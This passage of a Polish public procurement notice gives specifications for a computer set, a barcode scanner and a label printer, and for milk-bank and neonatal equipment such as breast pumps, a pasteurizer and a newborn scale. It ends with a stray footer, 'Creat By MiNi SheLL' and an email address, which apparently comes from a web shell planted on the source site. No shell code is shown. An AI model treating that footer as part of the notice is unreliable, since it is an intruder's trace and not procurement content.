oświadczenia i dokumenty dotyczące braku wykluczenia z postępowania muszą złożyć wszyscy Wykonawcy wchodzący w skład konsorcjum czy tworzący spółkę cywilną..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa zestawu komputerowego, skanera kodów, drukarki termotransferowej z systemem  znakowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. zestaw komputerowy - 1 zestaw<br>

2.skaner kodow - 1 szt.<br>

3.drukarka termotransferowa z systemem znakowania próbek - 1 szt.<br>
specyfikacje techniczne <br>

I. zestaw komputerowy<br>

1.procesor min. 3.1 ghz, min. 3 mb cache <br>

2.pamięć operacyjna min. 4 gb (1x4096mb) 1333 mhz możliwość rozbudowy do min 8 gb,<br>

3.dysk twardy o pojemności min. 500 gb sata, 7200 obr.na min<br>

4.karta graficzna, niezintegrowana, pamięć min 512 mb<br>

5.wyposażenie multimedialne 
karta dźwiękowa zintegrowana z płytą główną
porty słuchawek i mikrofonu na przednim oraz na tylnym panelu obudowy.<br>

6.obudowa typu minitower, zasilacz o mocy max 265w i efektywności min. 90%<br>

7.bezpieczeństwo
komputer powinien posiadać etykietę inwentaryzacyjną umieszczoną przez producenta sprzętu, która będzie zawierać informacje:
informację o fizycznym  adresie karty sieciowej,
numerze ewidencyjnym produktu,
adresie strony www serwisu producenta<br>

8.monitor lcd przekątna ekranu min 19 cali<br>

9.zainstalowany system operacyjny windows 7 professional 64 bit pl + nośnik 
   zainstalowany pakiet microsoft office + nośnik
    wbudowane porty usb: min. 2 z przodu obudowy i 6 z tyłu, port sieciowy, porty słuchawek i mikrofonu na przednim panelu obudowy, z tyłu port mikrofonu oraz wejście i wyjście liniowe stereo. 
    karta sieciowa zintegrowana z płytą główną 
    klawiatura usb w układzie polskim programisty 
    mysz optyczna usb z trzema klawiszami oraz rolką (scroll) 
    nagrywarka dvd + -rw wraz z oprogramowaniem do nagrywania i odtwarzania płyt<br>

10.drukarka laserowa monochromatyczna
prędkość druku w czerni (tryb normal, a4): do 33 str. na min
wydruk pierwszej strony w czerni (a4, po wyjściu ze stanu gotowości): w ciągu 8 s 
(z trybu automatycznego wyłączenia/oczekiwania)
jakość druku w czerni (tryb best): do 1200 x 1200 dpi
technologia druku: druk laserowy
standardowa liczba podajników papieru: 2
druk dwustronny: automatyczny (standardowo)
obsługiwane formaty nośników: a4, a5, a6, b5
waga: dopuszczalny ciężar do 11 kg
obsługiwane systemy operacyjne: windows 7 (32- i 64-bitowy); windows vista (32- i 64-bitowy); 
microsoft windows xp (32-bitowy -64-bitowy), server 2003 (32-bitowy -64-bitowy), 2000; mac os x v10.5, 
v10.6, v10.7 unix, linux
w zestawie kabel<br>


II. skaner kodów - 1 szt. <br>

1.odczyt kodów 1d-2d-pdf417 złej jakości<br>

2.szybkość skanowania - większe lub równe 100 skanów/s<br>

3.zasięg odczytu - 0-70 cm<br>

4.uchwyt pistoletowy<br>

5.odporność na upadek - min. 1,50 m<br>

6.norma przemysłowa - ip41<br>

7.uszczelnienie zgodne z normą ip43, odporny na działanie środków odkażających<br>

8.tryby pracy: automatyczny i manualny<br>

9.multi-interfejs (możliwość wymiennego użycia intefejsów: kbw, rs232 lub usb)<br>

10.automatyczna identyfikacja i konfiguracja interfejsu podłączonego kabla<br>


III.drukarka termotransferowa z systemem znakowania próbek - 1 szt.<br>

1.pamięć - 512 kb flash, 128 kb sram<br>

2.język programowania - epl1, epl2<br>

3.drukowane kody kreskowe - ucc-ean, jan, upc, code 39, code 11, code 93, code 128,
fim postnet, pdf417, maxcode, code 49, codabar, interleaved 2 of 5, msi-plessey<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa laktatora elektrycznego, podgrzewacza do strzykawek,  laboratoryjnej szafy dwukomorowej,  analizatora składu mleka kobiecego, szafy mroźnej,  pasteryzatora mleka kobiecego, komory laminarnej, zmywarki, elektronicznej wagi noworodkowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr 2  <br>

1. laktator elektryczny - 2 szt.<br>

2.podgrzewacz do strzykawek - 1 szt.<br>

3.laboratoryjna szafa dwukomorowa - 1 szt.<br>

4.analizator składu mleka kobiecego - 1 szt.<br>

5.szafa mroźna - 1 szt.<br>

6.pasteryzator mleka kobiecego - 1 szt.<br>

7.komora laminarna - 1 szt.<br>

8.zmywarka - 1 szt.<br>

9.elektroniczna waga noworodkowa - 1 szt.<br>


specyfikacje techniczne <br>

I.laktator elektryczny - 2 szt.<br>

1.zasilanie 230v, 50hz<br>

2.3-fazowy cykl ssania naśladujący cykl ssania dziecka<br>

3.płynna regulacja siły ssania<br>

4.przystosowane do pracy ciągłej (24 h na dobę)<br>

5.cicha i bezwibracyjna praca (do 45db)<br>

6.waga do 2,5 kg<br>

7.obudowa zapewniająca utrzymanie urządzenia w czystości<br>

8.konstrukcja zabezpieczająca przed przedostaniem się mleka do środka modułu<br>

9.wszystkie elementy mające kontakt z mlekiem nadające się do autoklawowania<br>

10.wyposażony w osobiste końcówki sterylne z butelkami na mleko, gotowe do użytku po rozpakowaniu z rękawa<br>

11.gwarancja zapewnienia zakupu części zamiennych przez okres min. 10 lat.<br>

II.podgrzewacz do strzykawek - 1 szt.<br>

1.zasilanie 230-240v, 50na60 hz. <br>

2.bezpiecznie podgrzewanie pokarmu matki do temperatu-ry min. 34stopni C w suchym, gorącym powietrzu. <br>

3.dwie funkcje do wyboru: podgrzewanie i rozmrażanie <br>

4.pokarm może mieć różne temperatury początkowe: od +20stopni C do -20stopni C <br>

5.czas podgrzewania dostosowany do pojemności porcji <br>

6.sygnał dźwiękowy i wizualny informujący o zakończeniu procesu <br>

7.przystosowany do podgrzewania pokarmu kolekcjono-wanego w pojemnikach o różnych pojemnościach 
lub pokarmu umieszczonego w strzykawkach. <br>

III.laboratoryjna szafa dwukomorowa - 1 szt.<br>

1.ustawianie temperatury z dokładnością do 0,1stopni C<br>

2.dźwiękowy i optyczny alarm otwartych drzwi i podwyższonej lub niskiej temperatury<br>

3.pamięć min. i max. temperatury oraz braku zasilania; pamięć ostatnich trzech alarmów<br>

4.dodatkowy port dostępu dla zewnętrznego czujnika temperatury w każdej komorze urządzenia<br>

5.pojemność min. 350 l w tym:
chłodziarki min. 254 l
zamrażarki min. 107 l<br>

6.zakres temperatur
- chłodziarki - od +3stopni c do +8stopni c
- zamrażarki - od -9stopni c do -30stopni c<br>

7.zużycie energii max. 1,8 kwh na dobę<br>

8.dynamiczno-statyczny system chłodzenia<br>

9.metoda odszraniania:
- chłodziarka - automatyczny
- zamrażarka - manualny<br>

10.kolor obudowy i wnętrza do ustalenia z użytkownikiem<br>

11.samoczynne zamykanie drzwi<br>

12.sterowanie elektroniczne oddzielne dla chłodziarki i zamrażarki:
- 2 kompresory
- 2 panele sterowania
- 2 systemy alarmu otwartych drzwi oraz wysokiej temperatury
- 1 alarm przerwy w zasilaniu
- 1 interfejs rs 485/styk bezpotencjałowy
- 2 zamki<br>

13.wyposażenie chłodziarki: min. 4 ruszty pokryte tworzywem<br>

14.wyposażenie zamrażarki: min. 3 szuflady z transparentnym frontem<br>

15.klasa klimatyczna: sn-st (temperatura otoczenia od +10stopni c do +38stopni c<br>

16.czynnik chłodniczy r600a<br>

IV. analizator składu mleka kobiecego - 1 szt.<br>

1.pomiar składników mleka (tłuszczu, białka, laktozy, substancji suchych nie tłuszczowych, wartości energetycznej) za pomocą  spektroskopii  transmisji w podczerwieni) bez konieczności użycia chemikaliów<br>

2.objętość próbki od 1-3 ml w zakresie temperatur od 20stopni c do 40stopni c<br>

3.czas analizy maks. 60 sek.<br>

4.powtarzalność (sd) max. 0.05%<br>

5.zgodność pomiaru
 (sd) max. 0.1 %<br>

6.zasilanie  15 v, 4adc<br>

7.port usb do pamięci zewnętrznej<br>

8.wewnętrzna pamięć - min. 4000 pomiarów<br>

9.system operacyjny - windows ce 5.0<br>


V.szafa mroźna - 1 szt.<br>

1.pojemność większa lub równa  300 l<br>

2.szerokość  użytkowa większa lub równa  40 cm<br>

3.głębokość użytkowa  większa lub równa  40 cm<br>

4.wysokość użytkowa większa lub równa 160 cm<br>

5.obudowa, drzwi i pokrywa stalowe; kolor do ustalenia z użytkownikiem<br>

6.drzwi przestawne z ergonomicznym uchwytem drążkowym z zamkiem na wyposażeniu<br>

7.wyposażenie zamrażarki:większa lub równa  8 szuflad z transparentnym frontem<br>

8.zużycie energii: mniejsza lub równa  1,309 kwh/dobę<br>

9.izolacja - min. 7 mm<br>

10.maksymalna waga szafy - 94 kg<br>

11.klasa klimatyczna sn-st (temperatura otoczenia od +10stopni c do +38stopni c)<br>

12.czynnik chłodniczy r600a<br>

13.zakres napięcia 220-250 v<br>

14.metoda odszraniania: ręczna<br>

15.zakres temperatury:  -9stopni c do -30stopni c<br>

16.zewnętrzny wskaźnik temperatury w komorze<br>

17.optyczny i akustyczny sygnał awarii<br>

VI. pasteryzator mleka kobiecego - 1 szt.<br>

1.pojemność  większa lub równa  3 l <br>

2.możliwość umieszczenia co najmniej12 butelek o poj. od 130 do 230 ml<br>

3.wykonanie w wersji nastołowej<br>

4.szybkie schładzanie do 4stopni c<br>

5.wymiary: 1100 x 600 x 450 +/-5%<br>

6.zasilanie: 230 v, 50 hz, 2400 w, 11 fla<br>

7.urządzenie zgodne z normami: en60204-1, en294: 1992, ac: 1993<br>

8.urządzenie posiadające ce: 89/292.eec, 91/368/eec, 93/44eec<br>

9.wykonanie ze stali nierdzewnej<br>

10.koszyk na butelki, oprogramowanie i czytnik w komplecie <br>

VII.komora laminarna - 1 szt.<br>

1.filtry: laminarny, pionowy  
filtr wstępny: poliamidowy klasy eu3 (g3) wg. normy pn-en 779
filtr główny: absolutny hepa en 1800, skuteczność filtracji min. 99,997% dla cząstek 0,3 ?m (żywotność filtra hepa min. 3000 h)<br>

2.dotykowy panel sterowania z osobnym włącznikiem trybu auto, oświetlenia i uv oraz regulacją nawiewu<br>

3.sterowanie mikroprocesorowe:
- tryb automatyczny -przedmuchanie, ustawienie przepływu, załączenie lampy jarzeniowej
- tryb ręczny - przepływ, lampa jarzeniowa, uv<br>

4.cyfrowy licznik czasu pracy oraz wewnętrzny system nadzoru informujący o błędach pracy<br>

5.wymiary maksymalne:
- szerokość - do 700 mm
- wysokość - do 780 mm
- głębokość - do 500 mm<br>

6.wyposażenie komory:
- lampa doświetlająca przestrzeń roboczą
- lampa bakteriobójcza uv
- gniazdo elektryczne na obudowie komory
- licznik czasu pracy komory oraz lampy uv
- blat roboczy ze stali nierdzewnej<br>

VIII.zmywarka  - 1 szt.<br>

1.klasa energetyczna - co najmniej a+<br>

2.ilość kompletów - min. 12<br>

3.maksymalne wymiary:
81,5x60x60<br>

4.zakres temperatury mycia: 35stopni c do 75stopni c<br>

5.funkcja wyparzania<br>

IX.elektroniczna waga noworodkowa 1 szt.<br>

1.dokładność pomiaru - min. 10 g 
klasa dokładności - co najmniej 3<br>

2.waga maksymalna dziecka - min. 15 kg<br>

3.zasilanie: akumulatorki i zasilacz (w zestawie)<br>

4.wymiary szalki: min. 500 x 270 mm<br>

5.wyświetlacz lcd <br>

6.funkcje tara, hold<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com